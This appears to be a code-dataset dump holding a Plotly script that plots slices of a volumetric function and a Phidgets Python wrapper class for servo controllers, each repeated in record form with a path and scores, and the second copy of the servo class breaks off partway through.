zaxis=pgo.layout.scene.ZAxis(axis, range=[-2, 2]),
aspectratio=dict(x=1, y=1, z=1),
),
)
surfcolor_obl = volume(x, y, z)
smino, smaxo = get_lims_colors(surfcolor_obl)
vmin = min([sminz, smino])
vmax = max([smaxz, smaxo])
slice_obl = get_the_slice(x, y, z, surfcolor_obl)
slice_obl.update(cmin=vmin, cmax=vmax, showscale=True)
slice_z.update(cmin=vmin, cmax=vmax)
fig = pgo.Figure(data=[slice_z, slice_obl], layout=layout)
plotly.offline.plot(fig, filename="Slice-volumetric-2.html")
if __name__ == "__main__":
main() | slice3d.py | import plotly
import plotly.graph_objs as pgo
import numpy as np
pl_BrBG = [
[0.0, "rgb(84, 48, 5)"],
[0.1, "rgb(138, 80, 9)"],
[0.2, "rgb(191, 129, 45)"],
[0.3, "rgb(222, 192, 123)"],
[0.4, "rgb(246, 232, 195)"],
[0.5, "rgb(244, 244, 244)"],
[0.6, "rgb(199, 234, 229)"],
[0.7, "rgb(126, 203, 192)"],
[0.8, "rgb(53, 151, 143)"],
[0.9, "rgb(0, 101, 93)"],
[1.0, "rgb(0, 60, 48)"],
]
def get_the_slice(x, y, z, surfacecolor, colorscale=pl_BrBG, showscale=False):
"""https://plot.ly/python/reference/#surface"""
return pgo.Surface(
x=x, y=y, z=z, surfacecolor=surfacecolor, colorscale=colorscale, showscale=showscale
)
def get_lims_colors(surfacecolor): # color limits for a slice
return np.min(surfacecolor), np.max(surfacecolor)
def main():
alpha = np.pi / 5
x = np.linspace(-2, 2, 50)
y = np.linspace(-2, 2, 50)
x, y = np.meshgrid(x, y)
z = -x * np.tan(alpha)
def volume(x, y, z):
return x * np.exp(-x ** 2 - y ** 2 - z ** 2)
x = np.linspace(-2, 2, 50)
y = np.linspace(-2, 2, 50)
x, y = np.meshgrid(x, y)
z = np.zeros(x.shape)
surfcolor_z = volume(x, y, z)
sminz, smaxz = get_lims_colors(surfcolor_z)
slice_z = get_the_slice(x, y, z, surfcolor_z)
x = np.linspace(-2, 2, 50)
z = np.linspace(-2, 2, 50)
x, z = np.meshgrid(x, y)
y = -0.5 * np.ones(x.shape)
surfcolor_y = volume(x, y, z)
sminy, smaxy = get_lims_colors(surfcolor_y)
vmin = min([sminz, sminy])
vmax = max([smaxz, smaxy])
# slice_y = get_the_slice(x, y, z, surfcolor_y)
axis = dict(
showbackground=True,
backgroundcolor="rgb(230, 230,230)",
gridcolor="rgb(255, 255, 255)",
zerolinecolor="rgb(255, 255, 255)",
)
layout = dict(
title="Slices in volumetric data",
width=700,
height=700,
scene=dict(
xaxis=pgo.layout.scene.XAxis(axis),
yaxis=pgo.layout.scene.YAxis(axis),
zaxis=pgo.layout.scene.ZAxis(axis, range=[-2, 2]),
aspectratio=dict(x=1, y=1, z=1),
),
)
surfcolor_obl = volume(x, y, z)
smino, smaxo = get_lims_colors(surfcolor_obl)
vmin = min([sminz, smino])
vmax = max([smaxz, smaxo])
slice_obl = get_the_slice(x, y, z, surfcolor_obl)
slice_obl.update(cmin=vmin, cmax=vmax, showscale=True)
slice_z.update(cmin=vmin, cmax=vmax)
fig = pgo.Figure(data=[slice_z, slice_obl], layout=layout)
plotly.offline.plot(fig, filename="Slice-volumetric-2.html")
if __name__ == "__main__":
main() | 0.771069 | 0.518485 |
__author__ = '<NAME>'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import CurrentChangeEventArgs, PositionChangeEventArgs, VelocityChangeEventArgs
import sys
class AdvancedServo(Phidget):
"""This class represents a Phidget AdvancedServo Controller.
All methods to control a AdvancedServo Controller are implemented in this class.
See the product manual for more specific API details, supported functionality, units, etc.
Extends:
Phidget
"""
#servoTypes = {'DEFAULT':1, 'RAW_us_MODE':2, 'HITEC_HS322HD':3, 'HITEC_HS5245MG':4, 'HITEC_805BB':5, 'HITEC_HS422':6, 'TOWERPRO_MG90':7, 'USER_DEFINED':8, 'INVALID':0}
def __init__(self):
"""The Constructor Method for the AdvancedServo Class
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
"""
Phidget.__init__(self)
self.__currentChange = None
self.__positionChange = None
self.__velocityChange = None
self.__onCurrentChange = None
self.__onPositionChange = None
self.__onVelocityChange = None
try:
PhidgetLibrary.getDll().CPhidgetAdvancedServo_create(byref(self.handle))
except RuntimeError:
raise
if sys.platform == 'win32':
self.__CURRENTCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__POSITIONCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__VELOCITYCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__CURRENTCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__POSITIONCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__VELOCITYCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
def __del__(self):
"""The Destructor Method for the AdvancedServo Class
"""
Phidget.dispose(self)
def getMotorCount(self):
"""Returns the number of motors this Phidget can support.
Note that there is no way of programatically determining how many motors are actually attached to the board.
Returns:
The number of motors <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
motorCount = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getMotorCount(self.handle, byref(motorCount))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return motorCount.value
def getAcceleration(self, index):
"""Returns a motor's acceleration.
The valid range is between getAccelerationMin and getAccelerationMax,
and refers to how fast the AdvancedServo Controller will change the speed of a motor.
Parameters:
index<int>: index of motor.
Returns:
The acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
accel = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAcceleration(self.handle, c_int(index), byref(accel))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accel.value
def setAcceleration(self, index, value):
"""Sets a motor's acceleration.
The valid range is between getAccelerationMin and getAccelerationMax.
This controls how fast the motor changes speed.
Parameters:
index<int>: index of the motor.
value<double>: requested acceleration for that motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or acceleration value are invalid.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setAcceleration(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getAccelerationMax(self, index):
"""Returns the maximum acceleration that a motor will accept, or return.
Parameters:
index<int>: Index of the motor.
Returns:
Maximum acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
accelMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMax(self.handle, c_int(index), byref(accelMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accelMax.value
def getAccelerationMin(self, index):
"""Returns the minimum acceleration that a motor will accept, or return.
Parameters:
index<int>: Index of the motor.
Returns:
Minimum acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
accelMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMin(self.handle, c_int(index), byref(accelMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accelMin.value
def getVelocityLimit(self, index):
"""Gets the last set velocity limit for a motor.
The valid range is between getVelocityMin and getVelocityMax
Parameters:
index<int>: index of the motor.
Returns:
The current velocity limit of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyLimit = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityLimit(self.handle, c_int(index), byref(veloctiyLimit))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyLimit.value
def setVelocityLimit(self, index, value):
"""Sets the velocity limit for a motor.
The valid range is between getVelocityMin and getVelocityMax
Parameters:
index<int>: index of the motor.
value<double>: requested velocity limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or velocity value are invalid.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setVelocityLimit(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getVelocity(self, index):
"""Gets the current velocity of a motor.
The range for this value should be between getVelocityMin and getVelocityLimit
Parameters:
index<int>: index of the motor.
Returns:
The current velocity of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiy = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocity(self.handle, c_int(index), byref(veloctiy))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiy.value
def getVelocityMax(self, index):
"""Gets the maximum velocity that can be set for a motor.
Parameters:
index<int>: index of the motor.
Returns:
The maximum velocity for the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMax(self.handle, c_int(index), byref(veloctiyMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyMax.value
def getVelocityMin(self, index):
"""Gets the minimum velocity that can be set for a motor.
Parameters:
index<int>: index of the motor.
Returns:
The minimum velocity for the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMin(self.handle, c_int(index), byref(veloctiyMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyMin.value
def __nativeVelocityChangeEvent(self, handle, usrptr, index, value):
if self.__velocityChange != None:
self.__velocityChange(VelocityChangeEventArgs(self, index, value))
return 0
def setOnVelocityChangeHandler(self, velocityChangeHandler):
"""Sets the VelocityChange Event Handler.
The velocity change handler is a method that will be called when the velocity of a motor changes.
These velocity changes are reported back from the AdvancedServo Controller and so correspond to actual motor velocity over time.
Parameters:
velocityChangeHandler: hook to the velocityChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if velocityChangeHandler == None:
self.__velocityChange = None
self.__onVelocityChange = None
else:
self.__velocityChange = velocityChangeHandler
self.__onVelocityChange = self.__VELOCITYCHANGEHANDLER(self.__nativeVelocityChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnVelocityChange_Handler(self.handle, self.__onVelocityChange, None)
except RuntimeError:
self.__velocityChange = None
self.__onVelocityChange = None
raise
if result > 0:
raise PhidgetException(result)
def getPosition(self, index):
"""Returns the position of a servo motor.
Note that since servo motors do not offer any feedback in their interface, this value is simply whatever the servo was last set to.
There is no way of determining the position of a servo that has been plugged in, until it's position has been set.
Therefore, if an initial position is important, it should be set as part of initialization.
If the servo is not engaged, the position is unknown and calling this function will throw an exception.
The range here is between getPositionMin and getPositionMax, and corresponds aproximately to an angle in degrees. Note that most servos will not be able to operate accross this entire range.
Parameters:
index<int>: index of the motor.
Returns:
The current position of the selected motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range, or the motor is not engaged.
"""
position = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPosition(self.handle, c_int(index), byref(position))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return position.value
def setPosition(self, index, value):
"""Sets the position of a servo motor.
The range here is between getPositionMin and getPositionMax, and corresponds aproximately to an angle in degrees.
Note that most servos will not be able to operate accross this entire range.
Typically, the range might be 25 - 180 degrees, but this depends on the servo.
Parameters:
index<int>: index of the motor.
position<double>: desired position for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired position is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPosition(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPositionMax(self, index):
"""Returns the maximum position that a servo will accept, or return.
Returns:
The maximum position in degrees <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
positionMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMax(self.handle, c_int(index), byref(positionMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return positionMax.value
def setPositionMax(self, index, value):
"""Sets the maximum position of a servo motor.
Parameters:
index<int>: index of the motor.
position<double>: desired maximum position limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired maximum position limit is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMax(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPositionMin(self, index):
"""Returns the minimum position that a servo will accept, or return.
Returns:
The minimum position in degrees <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
positionMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMin(self.handle, c_int(index), byref(positionMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return positionMin.value
def setPositionMin(self, index, value):
"""Sets the minimum position of a servo motor.
Parameters:
index<int>: index of the motor.
position<double>: desired minimum position limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired minimum position limit is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMin(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def __nativePositionChangeEvent(self, handle, usrptr, index, value):
if self.__positionChange != None:
self.__positionChange(PositionChangeEventArgs(self, index, value))
return 0
def setOnPositionChangeHandler(self, positionChangeHandler):
"""Sets the Position Change Event Handler.
The servo position change handler is a method that will be called when the servo position has changed.
The event will get fired after every call to setPosition.
Parameters:
positionChangeHandler: hook to the positionChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if positionChangeHandler == None:
self.__positionChange = None
self.__onPositionChange = None
else:
self.__positionChange = positionChangeHandler
self.__onPositionChange = self.__POSITIONCHANGEHANDLER(self.__nativePositionChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnPositionChange_Handler(self.handle, self.__onPositionChange, None)
except RuntimeError:
self.__positionChange = None
self.__onPositionChange = None
raise
if result > 0:
raise PhidgetException(result)
def getCurrent(self, index):
"""Returns a motor's current usage.
Parameters:
index<int>: index of the motor.
Returns:
The current usage of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
current = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getCurrent(self.handle, c_int(index), byref(current))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return current.value
def __nativeCurrentChangeEvent(self, handle, usrptr, index, value):
if self.__currentChange != None:
self.__currentChange(CurrentChangeEventArgs(self, index, value))
return 0
def setOnCurrentChangeHandler(self, currentChangeHandler):
"""Sets the CurrentCHange Event Handler.
The current change handler is a method that will be called when the current consumed by a motor changes.
Parameters:
currentChangeHandler: hook to the currentChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if currentChangeHandler == None:
self.__currentChange = None
self.__onCurrentChange = None
else:
self.__currentChange = currentChangeHandler
self.__onCurrentChange = self.__CURRENTCHANGEHANDLER(self.__nativeCurrentChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnCurrentChange_Handler(self.handle, self.__onCurrentChange, None)
except RuntimeError:
self.__currentChange = None
self.__onCurrentChange = None
raise
if result > 0:
raise PhidgetException(result)
def getSpeedRampingOn(self, index):
"""Gets the speed ramping state for a motor.
This is whether or not velocity and acceleration are used.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the speedRamping flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
rampingState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getSpeedRampingOn(self.handle, c_int(index), byref(rampingState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if rampingState.value == 1:
return True
else:
return False
def setSpeedRampingOn(self, index, state):
"""Sets the speed ramping state for a motor.
This is whether or not velocity and acceleration are used.
Parameters:
index<int>: Index of the motor.
state<boolean>: State to set the speedRamping flag for this motor to.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
if state == True:
value = 1
else:
value = 0
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setSpeedRampingOn(self.handle, c_int(index), c_int(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getEngaged(self, index):
"""Gets the engaged state of a motor.
This is whether the motor is powered or not.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the engaged flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
engagedState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getEngaged(self.handle, c_int(index), byref(engagedState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if engagedState.value == 1:
return True
else:
return False
def setEngaged(self, index, state):
"""Sets the engaged state of a motor.
This is whether the motor is powered or not.
Parameters:
index<int>: Index of the motor.
state<boolean>: State to set the engaged flag for this motor to.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
if state == True:
value = 1
else:
value = 0
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setEngaged(self.handle, c_int(index), c_int(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getStopped(self, index):
"""Gets the stopped state of a motor.
This is true when the motor is not moving and there are no outstanding commands.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the stopped flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
stoppedState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getStopped(self.handle, c_int(index), byref(stoppedState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if stoppedState.value == 1:
return True
else:
return False
def getServoType(self, index):
"""Returns the servo type of the specified motor.
Parameters:
index<int>: index of a servo motor.
Returns:
Servo type for the motor<int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
servoType = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getServoType(self.handle, c_int(index), byref(servoType))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return servoType.value
def setServoType(self, index, servoType):
"""Sets the desired servo type for a specified motor.
Parameters:
index<int>: index of a servo motor.
servoType<int>: The desired servo type for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoType(self.handle, c_int(index), c_int(servoType))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def setServoParameters(self, index, minimumPulseWidth, maximumPulseWidth, degrees, velocityMax):
"""Sets custom servo parameters for using a servo not in the predefined list.
Pulse widths are specified in microseconds.
Parameters:
index<int>: index of a servo motor.
minimumPulseWidth<double>: The minimum pulse width for this servo motor type.
maximumPulseWidth<double>: The Maximum pulse width for this servo motor type.
degrees<double>: The maximum degrees of rotation this servo motor type is capable of.
velocityMax<double>: The maximum velocity this servo motor type is capable of.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoParameters(self.handle, c_int(index), c_double(minimumPulseWidth), c_double(maximumPulseWidth), c_double(degrees), c_double(velocityMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result) | contrib/Phidgets/Devices/AdvancedServo.py | __author__ = '<NAME>'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import CurrentChangeEventArgs, PositionChangeEventArgs, VelocityChangeEventArgs
import sys
class AdvancedServo(Phidget):
"""This class represents a Phidget AdvancedServo Controller.
All methods to control a AdvancedServo Controller are implemented in this class.
See the product manual for more specific API details, supported functionality, units, etc.
Extends:
Phidget
"""
#servoTypes = {'DEFAULT':1, 'RAW_us_MODE':2, 'HITEC_HS322HD':3, 'HITEC_HS5245MG':4, 'HITEC_805BB':5, 'HITEC_HS422':6, 'TOWERPRO_MG90':7, 'USER_DEFINED':8, 'INVALID':0}
def __init__(self):
"""The Constructor Method for the AdvancedServo Class
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
"""
Phidget.__init__(self)
self.__currentChange = None
self.__positionChange = None
self.__velocityChange = None
self.__onCurrentChange = None
self.__onPositionChange = None
self.__onVelocityChange = None
try:
PhidgetLibrary.getDll().CPhidgetAdvancedServo_create(byref(self.handle))
except RuntimeError:
raise
if sys.platform == 'win32':
self.__CURRENTCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__POSITIONCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__VELOCITYCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__CURRENTCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__POSITIONCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
self.__VELOCITYCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_double)
def __del__(self):
"""The Destructor Method for the AdvancedServo Class
"""
Phidget.dispose(self)
def getMotorCount(self):
"""Returns the number of motors this Phidget can support.
Note that there is no way of programatically determining how many motors are actually attached to the board.
Returns:
The number of motors <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
motorCount = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getMotorCount(self.handle, byref(motorCount))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return motorCount.value
def getAcceleration(self, index):
"""Returns a motor's acceleration.
The valid range is between getAccelerationMin and getAccelerationMax,
and refers to how fast the AdvancedServo Controller will change the speed of a motor.
Parameters:
index<int>: index of motor.
Returns:
The acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
accel = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAcceleration(self.handle, c_int(index), byref(accel))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accel.value
def setAcceleration(self, index, value):
"""Sets a motor's acceleration.
The valid range is between getAccelerationMin and getAccelerationMax.
This controls how fast the motor changes speed.
Parameters:
index<int>: index of the motor.
value<double>: requested acceleration for that motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or acceleration value are invalid.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setAcceleration(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getAccelerationMax(self, index):
"""Returns the maximum acceleration that a motor will accept, or return.
Parameters:
index<int>: Index of the motor.
Returns:
Maximum acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
accelMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMax(self.handle, c_int(index), byref(accelMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accelMax.value
def getAccelerationMin(self, index):
"""Returns the minimum acceleration that a motor will accept, or return.
Parameters:
index<int>: Index of the motor.
Returns:
Minimum acceleration of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
accelMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getAccelerationMin(self.handle, c_int(index), byref(accelMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return accelMin.value
def getVelocityLimit(self, index):
"""Gets the last set velocity limit for a motor.
The valid range is between getVelocityMin and getVelocityMax
Parameters:
index<int>: index of the motor.
Returns:
The current velocity limit of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyLimit = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityLimit(self.handle, c_int(index), byref(veloctiyLimit))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyLimit.value
def setVelocityLimit(self, index, value):
"""Sets the velocity limit for a motor.
The valid range is between getVelocityMin and getVelocityMax
Parameters:
index<int>: index of the motor.
value<double>: requested velocity limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or velocity value are invalid.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setVelocityLimit(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getVelocity(self, index):
"""Gets the current velocity of a motor.
The range for this value should be between getVelocityMin and getVelocityLimit
Parameters:
index<int>: index of the motor.
Returns:
The current velocity of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiy = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocity(self.handle, c_int(index), byref(veloctiy))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiy.value
def getVelocityMax(self, index):
"""Gets the maximum velocity that can be set for a motor.
Parameters:
index<int>: index of the motor.
Returns:
The maximum velocity for the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMax(self.handle, c_int(index), byref(veloctiyMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyMax.value
def getVelocityMin(self, index):
"""Gets the minimum velocity that can be set for a motor.
Parameters:
index<int>: index of the motor.
Returns:
The minimum velocity for the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
veloctiyMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getVelocityMin(self.handle, c_int(index), byref(veloctiyMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return veloctiyMin.value
def __nativeVelocityChangeEvent(self, handle, usrptr, index, value):
if self.__velocityChange != None:
self.__velocityChange(VelocityChangeEventArgs(self, index, value))
return 0
def setOnVelocityChangeHandler(self, velocityChangeHandler):
"""Sets the VelocityChange Event Handler.
The velocity change handler is a method that will be called when the velocity of a motor changes.
These velocity changes are reported back from the AdvancedServo Controller and so correspond to actual motor velocity over time.
Parameters:
velocityChangeHandler: hook to the velocityChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
